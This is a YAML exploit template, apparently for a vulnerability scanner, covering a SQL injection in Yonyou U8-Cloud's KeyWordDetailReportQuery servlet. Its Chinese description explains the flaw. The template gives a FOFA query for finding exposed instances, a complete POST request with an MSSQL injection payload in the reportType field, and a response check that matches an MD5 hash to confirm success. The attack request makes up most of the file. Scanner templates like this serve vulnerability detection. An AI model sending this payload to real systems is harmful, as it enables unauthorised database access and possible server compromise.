product: 用友U8-Cloud
vName: 用友U8-Cloud KeyWordDetailReportQuery SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友U8-Cloud KeyWordDetailReportQuery接口存在SQL注入漏洞，由于用友GRP-U8未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞，进一步利用可造成主机失陷。
version: ''
note: ''
search:
  FOFA: app="用友-U8-Cloud"
protocol: http
link: https://blog.csdn.net/qq_36618918/article/details/135269254
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery
      json:
        keyword:
          - keywordIndex: 1
            keywordPk: '1'
            keywordValue: '1'
        reportType: "' AND 2780 IN sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')) AND 'njGF'='njGF"
        usercode: '18701014496'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and